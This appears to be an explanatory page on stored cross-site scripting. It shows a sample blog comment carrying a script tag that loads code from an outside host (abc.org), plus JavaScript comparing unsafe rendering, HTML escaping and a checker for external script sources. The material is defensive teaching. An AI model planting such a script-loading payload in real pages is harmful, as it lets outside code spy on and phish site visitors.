A cross-site scripting attack (cross-site scripting, abbreviated XSS) injects a script into the DOM of pages in other domains that are visible to other users. A malicious user may try to exploit this vulnerability to record a user's keystrokes or actions and steal certain information from that user. In the past, sites that displayed user submissions were particularly exposed to this vulnerability. For example, a user submits a comment on a blog, and the comment contains a script block that resembles the following code:
For that post ... <script type="text/javascript" src="http://abc.org/aa.js"></script>
When the page is viewed, only the comment text is visible, but the browser of every user who opens the page downloads the external script. That external script can spy on the user's login information or other on-screen content, or even rewrite the DOM to carry out phishing.
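The comment scenario above, as an added example that is not code from the original page: it renders a stored comment once by plain concatenation and once with output encoding, then checks the rendered markup for script sources on other hosts. The blog origin `https://blog.example`, the comment wording and all function names are assumptions made for the illustration.

```javascript
// Constructed sample comment, modelled on the one shown in the text.
const COMMENT =
  'Thanks for that post ... <script type="text/javascript" src="http://abc.org/aa.js"></script>';
const SITE = 'https://blog.example'; // assumed origin of the blog

// Vulnerable pattern: the stored comment is concatenated into the page as markup.
function renderCommentUnsafe(comment) {
  return '<div class="comment">' + comment + '</div>';
}

// Encode the characters that let text break out of an HTML text or
// quoted-attribute context. '&' must be replaced first.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened pattern: the comment is encoded on output, so it renders as text.
function renderCommentSafe(comment) {
  return '<div class="comment">' + escapeHtml(comment) + '</div>';
}

// Hypothetical audit helper: list hosts of <script src> elements in rendered
// markup that differ from the site's own host. A regex is enough for this
// sample; a real audit should use an HTML parser.
function externalScriptHosts(html, ownOrigin) {
  const ownHost = new URL(ownOrigin).host;
  const hosts = [];
  const re = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const host = new URL(m[1], ownOrigin).host; // resolves relative URLs too
    if (host !== ownHost) hosts.push(host);
  }
  return hosts;
}

console.log(externalScriptHosts(renderCommentUnsafe(COMMENT), SITE));
console.log(externalScriptHosts(renderCommentSafe(COMMENT), SITE));
console.log(renderCommentSafe(COMMENT));
```

In the encoded rendering the browser shows the tag as literal text and requests nothing from the other host.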
JavaScript Cross-Site scripting attacks